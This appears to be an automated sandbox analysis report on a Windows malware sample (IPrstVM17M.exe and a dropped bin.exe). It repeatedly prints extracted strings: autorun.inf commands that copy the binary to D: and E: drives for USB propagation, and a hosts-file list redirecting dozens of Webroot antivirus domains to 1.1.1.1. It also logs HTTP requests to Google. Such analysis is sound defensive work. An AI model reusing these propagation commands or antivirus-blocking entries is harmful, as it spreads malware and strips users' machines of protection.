Source: IPrstVM17M.exe, 00000000.00000003.2038465410.0000000000A83000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: copy /v /y "%s" D:\bin.exeecho [autorun] > D:\autorun.infecho open=bin.exe >> D:\autorun.infcopy /v /y "%s" E:\bin.exeecho [autorun] > E:\autorun.infecho open=bin.exe >> E:\autorun.infStarted blocking antiviruses...1.1.1.1 mail.webroot.comC:\Windows\System32\drivers\etc\hosts1.1.1.1 carbonite.webroot.com1.1.1.1 e.webroot.com1.1.1.1 entupdates-cdn.webroot.com1.1.1.1 lp-carbonite.webroot.com1.1.1.1 lp.webroot.com1.1.1.1 technet.webroot.com1.1.1.1 cms.webroot.com1.1.1.1 partner.webroot.com1.1.1.1 lp-carbonite-sandbox.webroot.com1.1.1.1 smtp-co.webroot.com1.1.1.1 smtp-ca.webroot.com1.1.1.1 vdi.webroot.com1.1.1.1 es.webroot.com1.1.1.1 usmail.webroot.com1.1.1.1 sftp.webroot.com1.1.1.1 lyncdiscover.webroot.com1.1.1.1 fr.webroot.com1.1.1.1 it.webroot.com1.1.1.1 dnsptest.webroot.com1.1.1.1 bounce2.webroot.com1.1.1.1 provisioningdev1.webroot.com1.1.1.1 nl.webroot.com1.1.1.1 mobiletest.webroot.com1.1.1.1 support-nl.webroot.com1.1.1.1 support-es.webroot.com1.1.1.1 sip.webroot.com1.1.1.1 contentr.webroot.com1.1.1.1 childsafe.webroot.com1.1.1.1 spyware.webroot.com1.1.1.1 testvpn.webroot.com1.1.1.1 support-de.webroot.com1.1.1.1 support-au.webroot.com1.1.1.1 support-fr.webroot.com1.1.1.1 support-it.webroot.com1.1.1.1 extranet.webroot.com1.1.1.1 sso-tst.webroot.com1.1.1.1 uk.webroot.com1.1.1.1 bb.webroot.com1.1.1.1 ncmec.webroot.com1.1.1.1 stage.webroot.com1.1.1.1 provisioningtest2.webroot.com1.1.1.1 websrv-stg.webroot.com1.1.1.1 de.webroot.com1.1.1.1 computer-security.webroot.com1.1.1.1 reseller.webroot.com1.1.1.1 connectuk.webroot.com1.1.1.1 vpn.webroot.com1.1.1.1 outbound5.webroot.com1.1.1.1 outbound2.webroot.com1.1.1.1 outbound3.webroot.com1.1.1.1 provisioningtest5.webroot.com1.1.1.1 view.webroot.com1.1.1.1 provisioningdev.webroot.com1.1.1.1 mydata.webroot.com1.1.1.1 provisioningtest4.webroot.com1.1.1.1 sfdcstage.webroot.com1.1.1.1 provisioning.webroot.com1.1.1.1 channeledge.webroot.com1.1.1.1 www2.webroot.com1.1.1.1 provisioningtest3.webroot.com1.1.1.1 mx.webroot.com1.1.1.1 support-enterprise.webroot.com1.1.1.1 autodiscover.webroot.com1.1.1.1 ws.webroot.com1.1.1.1 owauk.webroot.com1.1.1.1 outbound1.webroot.com1.1.1.1 research.webroot.com1.1.1.1 access-tst.webroot.com1.1.1.1 vpnuk.webroot.com1.1.1.1 ws-stg.webroot.com1.1.1.1 outbound4.webroot.com1.1.1.1 provisioningdev2.webroot.com1.1.1.1 myproduct.webroot.com1.1.1.1 labs.webroot.com1.1.1.1 tunnelfe.webroot.com1.1.1.1 mailbox.webroot.com1.1.1.1 outbound.webroot.com1.1.1.1 access.webroot.com1.1.1.1 sfdctest6.webroot.com1.1.1.1 encrypt.webroot.com1.1.1.1 outbound6.webroot.com1.1.1.1 mirage.webroot.com1.1.1.1 provisioningtest1.webroot.com1.1.1.1 origin-stage.webroot.com1.1.1.1 outbound7.webroot.com1.1.1.1 provisioningdev4.webroot.com1.1.1.1 workspace.webroot.com1.1.1.1 email.webroot.com1.1.1.1 itpro.webroot.com1.1.1.1 webmail.webroot.com1.1.1.1 brightcloud.webroot.com1.1.1.1 outlook.webroot.com1.1.1.1 android.webroot.com1.1.1.1 bounce.webroot.com1.1.1.1 codingchallenge.webroot.com1.1.1.1 connect.webroot.com1.1.1
Source: IPrstVM17M.exe, 00000000.00000002.4423772056.000000000020C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: echo [autorun] > D:\autorun.inf
Source: IPrstVM17M.exe, 00000000.00000002.4423772056.000000000020C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: echo [autorun] > D:\autorun.inf
Source: IPrstVM17M.exe, 00000000.00000002.4423772056.000000000020C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: echo open=bin.exe >> D:\autorun.inf
Source: IPrstVM17M.exe, 00000000.00000002.4423772056.000000000020C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: echo [autorun] > E:\autorun.inf
Source: IPrstVM17M.exe, 00000000.00000002.4423772056.000000000020C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: echo [autorun] > E:\autorun.inf
Source: IPrstVM17M.exe, 00000000.00000002.4423772056.000000000020C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: echo open=bin.exe >> E:\autorun.inf
Source: IPrstVM17M.exe, 00000000.00000002.4423772056.000000000020C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: copy /v /y "%s" D:\bin.exeecho [autorun] > D:\autorun.infecho open=bin.exe >> D:\autorun.infcopy /v /y "%s" E:\bin.exeecho [autorun] > E:\autorun.infecho open=bin.exe >> E:\autorun.infStarted blocking antiviruses...1.1.1.1 mail.webroot.comC:\Windows\System32\drivers\etc\hosts1.1.1.1 carbonite.webroot.com1.1.1.1 e.webroot.com1.1.1.1 entupdates-cdn.webroot.com1.1.1.1 lp-carbonite.webroot.com1.1.1.1 lp.webroot.com1.1.1.1 technet.webroot.com1.1.1.1 cms.webroot.com1.1.1.1 partner.webroot.com1.1.1.1 lp-carbonite-sandbox.webroot.com1.1.1.1 smtp-co.webroot.com1.1.1.1 smtp-ca.webroot.com1.1.1.1 vdi.webroot.com1.1.1.1 es.webroot.com1.1.1.1 usmail.webroot.com1.1.1.1 sftp.webroot.com1.1.1.1 lyncdiscover.webroot.com1.1.1.1 fr.webroot.com1.1.1.1 it.webroot.com1.1.1.1 dnsptest.webroot.com1.1.1.1 bounce2.webroot.com1.1.1.1 provisioningdev1.webroot.com1.1.1.1 nl.webroot.com1.1.1.1 mobiletest.webroot.com1.1.1.1 support-nl.webroot.com1.1.1.1 support-es.webroot.com1.1.1.1 sip.webroot.com1.1.1.1 contentr.webroot.com1.1.1.1 childsafe.webroot.com1.1.1.1 spyware.webroot.com1.1.1.1 testvpn.webroot.com1.1.1.1 support-de.webroot.com1.1.1.1 support-au.webroot.com1.1.1.1 support-fr.webroot.com1.1.1.1 support-it.webroot.com1.1.1.1 extranet.webroot.com1.1.1.1 sso-tst.webroot.com1.1.1.1 uk.webroot.com1.1.1.1 bb.webroot.com1.1.1.1 ncmec.webroot.com1.1.1.1 stage.webroot.com1.1.1.1 provisioningtest2.webroot.com1.1.1.1 websrv-stg.webroot.com1.1.1.1 de.webroot.com1.1.1.1 computer-security.webroot.com1.1.1.1 reseller.webroot.com1.1.1.1 connectuk.webroot.com1.1.1.1 vpn.webroot.com1.1.1.1 outbound5.webroot.com1.1.1.1 outbound2.webroot.com1.1.1.1 outbound3.webroot.com1.1.1.1 provisioningtest5.webroot.com1.1.1.1 view.webroot.com1.1.1.1 provisioningdev.webroot.com1.1.1.1 mydata.webroot.com1.1.1.1 provisioningtest4.webroot.com1.1.1.1 sfdcstage.webroot.com1.1.1.1 provisioning.webroot.com1.1.1.1 channeledge.webroot.com1.1.1.1 www2.webroot.com1.1.1.1 provisioningtest3.webroot.com1.1.1.1 mx.webroot.com1.1.1.1 support-enterprise.webroot.com1.1.1.1 autodiscover.webroot.com1.1.1.1 ws.webroot.com1.1.1.1 owauk.webroot.com1.1.1.1 outbound1.webroot.com1.1.1.1 research.webroot.com1.1.1.1 access-tst.webroot.com1.1.1.1 vpnuk.webroot.com1.1.1.1 ws-stg.webroot.com1.1.1.1 outbound4.webroot.com1.1.1.1 provisioningdev2.webroot.com1.1.1.1 myproduct.webroot.com1.1.1.1 labs.webroot.com1.1.1.1 tunnelfe.webroot.com1.1.1.1 mailbox.webroot.com1.1.1.1 outbound.webroot.com1.1.1.1 access.webroot.com1.1.1.1 sfdctest6.webroot.com1.1.1.1 encrypt.webroot.com1.1.1.1 outbound6.webroot.com1.1.1.1 mirage.webroot.com1.1.1.1 provisioningtest1.webroot.com1.1.1.1 origin-stage.webroot.com1.1.1.1 outbound7.webroot.com1.1.1.1 provisioningdev4.webroot.com1.1.1.1 workspace.webroot.com1.1.1.1 email.webroot.com1.1.1.1 itpro.webroot.com1.1.1.1 webmail.webroot.com1.1.1.1 brightcloud.webroot.com1.1.1.1 outlook.webroot.com1.1.1.1 android.webroot.com1.1.1.1 bounce.webroot.com1.1.1.1 codingchallenge.webroot.com1.1.1.1 connect.webroot.com1.1.1
Source: IPrstVM17M.exe, 00000000.00000002.4423772056.000000000020C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: copy /v /y "%s" D:\bin.exeecho [autorun] > D:\autorun.infecho open=bin.exe >> D:\autorun.infcopy /v /y "%s" E:\bin.exeecho [autorun] > E:\autorun.infecho open=bin.exe >> E:\autorun.infStarted blocking antiviruses...1.1.1.1 mail.webroot.comC:\Windows\System32\drivers\etc\hosts1.1.1.1 carbonite.webroot.com1.1.1.1 e.webroot.com1.1.1.1 entupdates-cdn.webroot.com1.1.1.1 lp-carbonite.webroot.com1.1.1.1 lp.webroot.com1.1.1.1 technet.webroot.com1.1.1.1 cms.webroot.com1.1.1.1 partner.webroot.com1.1.1.1 lp-carbonite-sandbox.webroot.com1.1.1.1 smtp-co.webroot.com1.1.1.1 smtp-ca.webroot.com1.1.1.1 vdi.webroot.com1.1.1.1 es.webroot.com1.1.1.1 usmail.webroot.com1.1.1.1 sftp.webroot.com1.1.1.1 lyncdiscover.webroot.com1.1.1.1 fr.webroot.com1.1.1.1 it.webroot.com1.1.1.1 dnsptest.webroot.com1.1.1.1 bounce2.webroot.com1.1.1.1 provisioningdev1.webroot.com1.1.1.1 nl.webroot.com1.1.1.1 mobiletest.webroot.com1.1.1.1 support-nl.webroot.com1.1.1.1 support-es.webroot.com1.1.1.1 sip.webroot.com1.1.1.1 contentr.webroot.com1.1.1.1 childsafe.webroot.com1.1.1.1 spyware.webroot.com1.1.1.1 testvpn.webroot.com1.1.1.1 support-de.webroot.com1.1.1.1 support-au.webroot.com1.1.1.1 support-fr.webroot.com1.1.1.1 support-it.webroot.com1.1.1.1 extranet.webroot.com1.1.1.1 sso-tst.webroot.com1.1.1.1 uk.webroot.com1.1.1.1 bb.webroot.com1.1.1.1 ncmec.webroot.com1.1.1.1 stage.webroot.com1.1.1.1 provisioningtest2.webroot.com1.1.1.1 websrv-stg.webroot.com1.1.1.1 de.webroot.com1.1.1.1 computer-security.webroot.com1.1.1.1 reseller.webroot.com1.1.1.1 connectuk.webroot.com1.1.1.1 vpn.webroot.com1.1.1.1 outbound5.webroot.com1.1.1.1 outbound2.webroot.com1.1.1.1 outbound3.webroot.com1.1.1.1 provisioningtest5.webroot.com1.1.1.1 view.webroot.com1.1.1.1 provisioningdev.webroot.com1.1.1.1 mydata.webroot.com1.1.1.1 provisioningtest4.webroot.com1.1.1.1 sfdcstage.webroot.com1.1.1.1 provisioning.webroot.com1.1.1.1 channeledge.webroot.com1.1.1.1 www2.webroot.com1.1.1.1 provisioningtest3.webroot.com1.1.1.1 mx.webroot.com1.1.1.1 support-enterprise.webroot.com1.1.1.1 autodiscover.webroot.com1.1.1.1 ws.webroot.com1.1.1.1 owauk.webroot.com1.1.1.1 outbound1.webroot.com1.1.1.1 research.webroot.com1.1.1.1 access-tst.webroot.com1.1.1.1 vpnuk.webroot.com1.1.1.1 ws-stg.webroot.com1.1.1.1 outbound4.webroot.com1.1.1.1 provisioningdev2.webroot.com1.1.1.1 myproduct.webroot.com1.1.1.1 labs.webroot.com1.1.1.1 tunnelfe.webroot.com1.1.1.1 mailbox.webroot.com1.1.1.1 outbound.webroot.com1.1.1.1 access.webroot.com1.1.1.1 sfdctest6.webroot.com1.1.1.1 encrypt.webroot.com1.1.1.1 outbound6.webroot.com1.1.1.1 mirage.webroot.com1.1.1.1 provisioningtest1.webroot.com1.1.1.1 origin-stage.webroot.com1.1.1.1 outbound7.webroot.com1.1.1.1 provisioningdev4.webroot.com1.1.1.1 workspace.webroot.com1.1.1.1 email.webroot.com1.1.1.1 itpro.webroot.com1.1.1.1 webmail.webroot.com1.1.1.1 brightcloud.webroot.com1.1.1.1 outlook.webroot.com1.1.1.1 android.webroot.com1.1.1.1 bounce.webroot.com1.1.1.1 codingchallenge.webroot.com1.1.1.1 connect.webroot.com1.1.1
Source: IPrstVM17M.exeBinary or memory string: echo [autorun] > D:\autorun.inf
Source: IPrstVM17M.exeBinary or memory string: echo [autorun] > D:\autorun.inf
Source: IPrstVM17M.exeBinary or memory string: echo open=bin.exe >> D:\autorun.inf
Source: IPrstVM17M.exeBinary or memory string: echo [autorun] > E:\autorun.inf
Source: IPrstVM17M.exeBinary or memory string: echo [autorun] > E:\autorun.inf
Source: IPrstVM17M.exeBinary or memory string: echo open=bin.exe >> E:\autorun.inf
Source: IPrstVM17M.exeBinary or memory string: copy /v /y "%s" D:\bin.exeecho [autorun] > D:\autorun.infecho open=bin.exe >> D:\autorun.infcopy /v /y "%s" E:\bin.exeecho [autorun] > E:\autorun.infecho open=bin.exe >> E:\autorun.infStarted blocking antiviruses...1.1.1.1 mail.webroot.comC:\Windows\System32\drivers\etc\hosts1.1.1.1 carbonite.webroot.com1.1.1.1 e.webroot.com1.1.1.1 entupdates-cdn.webroot.com1.1.1.1 lp-carbonite.webroot.com1.1.1.1 lp.webroot.com1.1.1.1 technet.webroot.com1.1.1.1 cms.webroot.com1.1.1.1 partner.webroot.com1.1.1.1 lp-carbonite-sandbox.webroot.com1.1.1.1 smtp-co.webroot.com1.1.1.1 smtp-ca.webroot.com1.1.1.1 vdi.webroot.com1.1.1.1 es.webroot.com1.1.1.1 usmail.webroot.com1.1.1.1 sftp.webroot.com1.1.1.1 lyncdiscover.webroot.com1.1.1.1 fr.webroot.com1.1.1.1 it.webroot.com1.1.1.1 dnsptest.webroot.com1.1.1.1 bounce2.webroot.com1.1.1.1 provisioningdev1.webroot.com1.1.1.1 nl.webroot.com1.1.1.1 mobiletest.webroot.com1.1.1.1 support-nl.webroot.com1.1.1.1 support-es.webroot.com1.1.1.1 sip.webroot.com1.1.1.1 contentr.webroot.com1.1.1.1 childsafe.webroot.com1.1.1.1 spyware.webroot.com1.1.1.1 testvpn.webroot.com1.1.1.1 support-de.webroot.com1.1.1.1 support-au.webroot.com1.1.1.1 support-fr.webroot.com1.1.1.1 support-it.webroot.com1.1.1.1 extranet.webroot.com1.1.1.1 sso-tst.webroot.com1.1.1.1 uk.webroot.com1.1.1.1 bb.webroot.com1.1.1.1 ncmec.webroot.com1.1.1.1 stage.webroot.com1.1.1.1 provisioningtest2.webroot.com1.1.1.1 websrv-stg.webroot.com1.1.1.1 de.webroot.com1.1.1.1 computer-security.webroot.com1.1.1.1 reseller.webroot.com1.1.1.1 connectuk.webroot.com1.1.1.1 vpn.webroot.com1.1.1.1 outbound5.webroot.com1.1.1.1 outbound2.webroot.com1.1.1.1 outbound3.webroot.com1.1.1.1 provisioningtest5.webroot.com1.1.1.1 view.webroot.com1.1.1.1 provisioningdev.webroot.com1.1.1.1 mydata.webroot.com1.1.1.1 provisioningtest4.webroot.com1.1.1.1 sfdcstage.webroot.com1.1.1.1 provisioning.webroot.com1.1.1.1 channeledge.webroot.com1.1.1.1 www2.webroot.com1.1.1.1 provisioningtest3.webroot.com1.1.1.1 mx.webroot.com1.1.1.1 support-enterprise.webroot.com1.1.1.1 autodiscover.webroot.com1.1.1.1 ws.webroot.com1.1.1.1 owauk.webroot.com1.1.1.1 outbound1.webroot.com1.1.1.1 research.webroot.com1.1.1.1 access-tst.webroot.com1.1.1.1 vpnuk.webroot.com1.1.1.1 ws-stg.webroot.com1.1.1.1 outbound4.webroot.com1.1.1.1 provisioningdev2.webroot.com1.1.1.1 myproduct.webroot.com1.1.1.1 labs.webroot.com1.1.1.1 tunnelfe.webroot.com1.1.1.1 mailbox.webroot.com1.1.1.1 outbound.webroot.com1.1.1.1 access.webroot.com1.1.1.1 sfdctest6.webroot.com1.1.1.1 encrypt.webroot.com1.1.1.1 outbound6.webroot.com1.1.1.1 mirage.webroot.com1.1.1.1 provisioningtest1.webroot.com1.1.1.1 origin-stage.webroot.com1.1.1.1 outbound7.webroot.com1.1.1.1 provisioningdev4.webroot.com1.1.1.1 workspace.webroot.com1.1.1.1 email.webroot.com1.1.1.1 itpro.webroot.com1.1.1.1 webmail.webroot.com1.1.1.1 brightcloud.webroot.com1.1.1.1 outlook.webroot.com1.1.1.1 android.webroot.com1.1.1.1 bounce.webroot.com1.1.1.1 codingchallenge.webroot.com1.1.1.1 connect.webroot.com1.1.1
Source: IPrstVM17M.exeBinary or memory string: copy /v /y "%s" D:\bin.exeecho [autorun] > D:\autorun.infecho open=bin.exe >> D:\autorun.infcopy /v /y "%s" E:\bin.exeecho [autorun] > E:\autorun.infecho open=bin.exe >> E:\autorun.infStarted blocking antiviruses...1.1.1.1 mail.webroot.comC:\Windows\System32\drivers\etc\hosts1.1.1.1 carbonite.webroot.com1.1.1.1 e.webroot.com1.1.1.1 entupdates-cdn.webroot.com1.1.1.1 lp-carbonite.webroot.com1.1.1.1 lp.webroot.com1.1.1.1 technet.webroot.com1.1.1.1 cms.webroot.com1.1.1.1 partner.webroot.com1.1.1.1 lp-carbonite-sandbox.webroot.com1.1.1.1 smtp-co.webroot.com1.1.1.1 smtp-ca.webroot.com1.1.1.1 vdi.webroot.com1.1.1.1 es.webroot.com1.1.1.1 usmail.webroot.com1.1.1.1 sftp.webroot.com1.1.1.1 lyncdiscover.webroot.com1.1.1.1 fr.webroot.com1.1.1.1 it.webroot.com1.1.1.1 dnsptest.webroot.com1.1.1.1 bounce2.webroot.com1.1.1.1 provisioningdev1.webroot.com1.1.1.1 nl.webroot.com1.1.1.1 mobiletest.webroot.com1.1.1.1 support-nl.webroot.com1.1.1.1 support-es.webroot.com1.1.1.1 sip.webroot.com1.1.1.1 contentr.webroot.com1.1.1.1 childsafe.webroot.com1.1.1.1 spyware.webroot.com1.1.1.1 testvpn.webroot.com1.1.1.1 support-de.webroot.com1.1.1.1 support-au.webroot.com1.1.1.1 support-fr.webroot.com1.1.1.1 support-it.webroot.com1.1.1.1 extranet.webroot.com1.1.1.1 sso-tst.webroot.com1.1.1.1 uk.webroot.com1.1.1.1 bb.webroot.com1.1.1.1 ncmec.webroot.com1.1.1.1 stage.webroot.com1.1.1.1 provisioningtest2.webroot.com1.1.1.1 websrv-stg.webroot.com1.1.1.1 de.webroot.com1.1.1.1 computer-security.webroot.com1.1.1.1 reseller.webroot.com1.1.1.1 connectuk.webroot.com1.1.1.1 vpn.webroot.com1.1.1.1 outbound5.webroot.com1.1.1.1 outbound2.webroot.com1.1.1.1 outbound3.webroot.com1.1.1.1 provisioningtest5.webroot.com1.1.1.1 view.webroot.com1.1.1.1 provisioningdev.webroot.com1.1.1.1 mydata.webroot.com1.1.1.1 provisioningtest4.webroot.com1.1.1.1 sfdcstage.webroot.com1.1.1.1 provisioning.webroot.com1.1.1.1 channeledge.webroot.com1.1.1.1 www2.webroot.com1.1.1.1 provisioningtest3.webroot.com1.1.1.1 mx.webroot.com1.1.1.1 support-enterprise.webroot.com1.1.1.1 autodiscover.webroot.com1.1.1.1 ws.webroot.com1.1.1.1 owauk.webroot.com1.1.1.1 outbound1.webroot.com1.1.1.1 research.webroot.com1.1.1.1 access-tst.webroot.com1.1.1.1 vpnuk.webroot.com1.1.1.1 ws-stg.webroot.com1.1.1.1 outbound4.webroot.com1.1.1.1 provisioningdev2.webroot.com1.1.1.1 myproduct.webroot.com1.1.1.1 labs.webroot.com1.1.1.1 tunnelfe.webroot.com1.1.1.1 mailbox.webroot.com1.1.1.1 outbound.webroot.com1.1.1.1 access.webroot.com1.1.1.1 sfdctest6.webroot.com1.1.1.1 encrypt.webroot.com1.1.1.1 outbound6.webroot.com1.1.1.1 mirage.webroot.com1.1.1.1 provisioningtest1.webroot.com1.1.1.1 origin-stage.webroot.com1.1.1.1 outbound7.webroot.com1.1.1.1 provisioningdev4.webroot.com1.1.1.1 workspace.webroot.com1.1.1.1 email.webroot.com1.1.1.1 itpro.webroot.com1.1.1.1 webmail.webroot.com1.1.1.1 brightcloud.webroot.com1.1.1.1 outlook.webroot.com1.1.1.1 android.webroot.com1.1.1.1 bounce.webroot.com1.1.1.1 codingchallenge.webroot.com1.1.1.1 connect.webroot.com1.1.1
Source: bin.exe.3.drBinary or memory string: echo [autorun] > D:\autorun.inf
Source: bin.exe.3.drBinary or memory string: echo [autorun] > D:\autorun.inf
Source: bin.exe.3.drBinary or memory string: echo open=bin.exe >> D:\autorun.inf
Source: bin.exe.3.drBinary or memory string: echo [autorun] > E:\autorun.inf
Source: bin.exe.3.drBinary or memory string: echo [autorun] > E:\autorun.inf
Source: bin.exe.3.drBinary or memory string: echo open=bin.exe >> E:\autorun.inf
Source: bin.exe.3.drBinary or memory string: copy /v /y "%s" D:\bin.exeecho [autorun] > D:\autorun.infecho open=bin.exe >> D:\autorun.infcopy /v /y "%s" E:\bin.exeecho [autorun] > E:\autorun.infecho open=bin.exe >> E:\autorun.infStarted blocking antiviruses...1.1.1.1 mail.webroot.comC:\Windows\System32\drivers\etc\hosts1.1.1.1 carbonite.webroot.com1.1.1.1 e.webroot.com1.1.1.1 entupdates-cdn.webroot.com1.1.1.1 lp-carbonite.webroot.com1.1.1.1 lp.webroot.com1.1.1.1 technet.webroot.com1.1.1.1 cms.webroot.com1.1.1.1 partner.webroot.com1.1.1.1 lp-carbonite-sandbox.webroot.com1.1.1.1 smtp-co.webroot.com1.1.1.1 smtp-ca.webroot.com1.1.1.1 vdi.webroot.com1.1.1.1 es.webroot.com1.1.1.1 usmail.webroot.com1.1.1.1 sftp.webroot.com1.1.1.1 lyncdiscover.webroot.com1.1.1.1 fr.webroot.com1.1.1.1 it.webroot.com1.1.1.1 dnsptest.webroot.com1.1.1.1 bounce2.webroot.com1.1.1.1 provisioningdev1.webroot.com1.1.1.1 nl.webroot.com1.1.1.1 mobiletest.webroot.com1.1.1.1 support-nl.webroot.com1.1.1.1 support-es.webroot.com1.1.1.1 sip.webroot.com1.1.1.1 contentr.webroot.com1.1.1.1 childsafe.webroot.com1.1.1.1 spyware.webroot.com1.1.1.1 testvpn.webroot.com1.1.1.1 support-de.webroot.com1.1.1.1 support-au.webroot.com1.1.1.1 support-fr.webroot.com1.1.1.1 support-it.webroot.com1.1.1.1 extranet.webroot.com1.1.1.1 sso-tst.webroot.com1.1.1.1 uk.webroot.com1.1.1.1 bb.webroot.com1.1.1.1 ncmec.webroot.com1.1.1.1 stage.webroot.com1.1.1.1 provisioningtest2.webroot.com1.1.1.1 websrv-stg.webroot.com1.1.1.1 de.webroot.com1.1.1.1 computer-security.webroot.com1.1.1.1 reseller.webroot.com1.1.1.1 connectuk.webroot.com1.1.1.1 vpn.webroot.com1.1.1.1 outbound5.webroot.com1.1.1.1 outbound2.webroot.com1.1.1.1 outbound3.webroot.com1.1.1.1 provisioningtest5.webroot.com1.1.1.1 view.webroot.com1.1.1.1 provisioningdev.webroot.com1.1.1.1 mydata.webroot.com1.1.1.1 provisioningtest4.webroot.com1.1.1.1 sfdcstage.webroot.com1.1.1.1 provisioning.webroot.com1.1.1.1 channeledge.webroot.com1.1.1.1 www2.webroot.com1.1.1.1 provisioningtest3.webroot.com1.1.1.1 mx.webroot.com1.1.1.1 support-enterprise.webroot.com1.1.1.1 autodiscover.webroot.com1.1.1.1 ws.webroot.com1.1.1.1 owauk.webroot.com1.1.1.1 outbound1.webroot.com1.1.1.1 research.webroot.com1.1.1.1 access-tst.webroot.com1.1.1.1 vpnuk.webroot.com1.1.1.1 ws-stg.webroot.com1.1.1.1 outbound4.webroot.com1.1.1.1 provisioningdev2.webroot.com1.1.1.1 myproduct.webroot.com1.1.1.1 labs.webroot.com1.1.1.1 tunnelfe.webroot.com1.1.1.1 mailbox.webroot.com1.1.1.1 outbound.webroot.com1.1.1.1 access.webroot.com1.1.1.1 sfdctest6.webroot.com1.1.1.1 encrypt.webroot.com1.1.1.1 outbound6.webroot.com1.1.1.1 mirage.webroot.com1.1.1.1 provisioningtest1.webroot.com1.1.1.1 origin-stage.webroot.com1.1.1.1 outbound7.webroot.com1.1.1.1 provisioningdev4.webroot.com1.1.1.1 workspace.webroot.com1.1.1.1 email.webroot.com1.1.1.1 itpro.webroot.com1.1.1.1 webmail.webroot.com1.1.1.1 brightcloud.webroot.com1.1.1.1 outlook.webroot.com1.1.1.1 android.webroot.com1.1.1.1 bounce.webroot.com1.1.1.1 codingchallenge.webroot.com1.1.1.1 connect.webroot.com1.1.1
Source: bin.exe.3.drBinary or memory string: copy /v /y "%s" D:\bin.exeecho [autorun] > D:\autorun.infecho open=bin.exe >> D:\autorun.infcopy /v /y "%s" E:\bin.exeecho [autorun] > E:\autorun.infecho open=bin.exe >> E:\autorun.infStarted blocking antiviruses...1.1.1.1 mail.webroot.comC:\Windows\System32\drivers\etc\hosts1.1.1.1 carbonite.webroot.com1.1.1.1 e.webroot.com1.1.1.1 entupdates-cdn.webroot.com1.1.1.1 lp-carbonite.webroot.com1.1.1.1 lp.webroot.com1.1.1.1 technet.webroot.com1.1.1.1 cms.webroot.com1.1.1.1 partner.webroot.com1.1.1.1 lp-carbonite-sandbox.webroot.com1.1.1.1 smtp-co.webroot.com1.1.1.1 smtp-ca.webroot.com1.1.1.1 vdi.webroot.com1.1.1.1 es.webroot.com1.1.1.1 usmail.webroot.com1.1.1.1 sftp.webroot.com1.1.1.1 lyncdiscover.webroot.com1.1.1.1 fr.webroot.com1.1.1.1 it.webroot.com1.1.1.1 dnsptest.webroot.com1.1.1.1 bounce2.webroot.com1.1.1.1 provisioningdev1.webroot.com1.1.1.1 nl.webroot.com1.1.1.1 mobiletest.webroot.com1.1.1.1 support-nl.webroot.com1.1.1.1 support-es.webroot.com1.1.1.1 sip.webroot.com1.1.1.1 contentr.webroot.com1.1.1.1 childsafe.webroot.com1.1.1.1 spyware.webroot.com1.1.1.1 testvpn.webroot.com1.1.1.1 support-de.webroot.com1.1.1.1 support-au.webroot.com1.1.1.1 support-fr.webroot.com1.1.1.1 support-it.webroot.com1.1.1.1 extranet.webroot.com1.1.1.1 sso-tst.webroot.com1.1.1.1 uk.webroot.com1.1.1.1 bb.webroot.com1.1.1.1 ncmec.webroot.com1.1.1.1 stage.webroot.com1.1.1.1 provisioningtest2.webroot.com1.1.1.1 websrv-stg.webroot.com1.1.1.1 de.webroot.com1.1.1.1 computer-security.webroot.com1.1.1.1 reseller.webroot.com1.1.1.1 connectuk.webroot.com1.1.1.1 vpn.webroot.com1.1.1.1 outbound5.webroot.com1.1.1.1 outbound2.webroot.com1.1.1.1 outbound3.webroot.com1.1.1.1 provisioningtest5.webroot.com1.1.1.1 view.webroot.com1.1.1.1 provisioningdev.webroot.com1.1.1.1 mydata.webroot.com1.1.1.1 provisioningtest4.webroot.com1.1.1.1 sfdcstage.webroot.com1.1.1.1 provisioning.webroot.com1.1.1.1 channeledge.webroot.com1.1.1.1 www2.webroot.com1.1.1.1 provisioningtest3.webroot.com1.1.1.1 mx.webroot.com1.1.1.1 support-enterprise.webroot.com1.1.1.1 autodiscover.webroot.com1.1.1.1 ws.webroot.com1.1.1.1 owauk.webroot.com1.1.1.1 outbound1.webroot.com1.1.1.1 research.webroot.com1.1.1.1 access-tst.webroot.com1.1.1.1 vpnuk.webroot.com1.1.1.1 ws-stg.webroot.com1.1.1.1 outbound4.webroot.com1.1.1.1 provisioningdev2.webroot.com1.1.1.1 myproduct.webroot.com1.1.1.1 labs.webroot.com1.1.1.1 tunnelfe.webroot.com1.1.1.1 mailbox.webroot.com1.1.1.1 outbound.webroot.com1.1.1.1 access.webroot.com1.1.1.1 sfdctest6.webroot.com1.1.1.1 encrypt.webroot.com1.1.1.1 outbound6.webroot.com1.1.1.1 mirage.webroot.com1.1.1.1 provisioningtest1.webroot.com1.1.1.1 origin-stage.webroot.com1.1.1.1 outbound7.webroot.com1.1.1.1 provisioningdev4.webroot.com1.1.1.1 workspace.webroot.com1.1.1.1 email.webroot.com1.1.1.1 itpro.webroot.com1.1.1.1 webmail.webroot.com1.1.1.1 brightcloud.webroot.com1.1.1.1 outlook.webroot.com1.1.1.1 android.webroot.com1.1.1.1 bounce.webroot.com1.1.1.1 codingchallenge.webroot.com1.1.1.1 connect.webroot.com1.1.1

Networking

barindex
Queries Google from non browser process on port 80
Source: C:\Users\user\Desktop\IPrstVM17M.exeHTTP traffic: GET / HTTP/1.1 User-Agent: MyApp Cache-Control: no-cache Connection: Keep-Alive Host: google.com
Source: C:\Users\user\Desktop\IPrstVM17M.exeHTTP traffic: GET /sorry/index?continue=http://google.com/&q=EgSaEGkkGMWRo7EGIjBKruM9TP71tcZqrz-afg1iOmL2n35A4yTbBqzqNKMrw11J0yadIqqCBxJ8xaVvZTgyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1 User-Agent: MyApp Cache-Control: no-cache Connection: Keep-Alive Host: www.google.com Cookie: NID=513=H1RAwZMpbccP2MupfzVClLXvboj2k_4nyM1TDtjKSCFjsE7EiTXH9bwLa77-PG9rFOQLO1-g_QxGqzQ3X6qDivIZpRs6mZysq9oxrD3VPUUav5jdQzsmUXuWYf1dyfAzzncyChxc77K4MzSt1SRaCs54NHbaLRz1tZDj5AKJbP8
Source: Joe Sandbox ViewIP Address: 104.26.8.202 104.26.8.202
Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
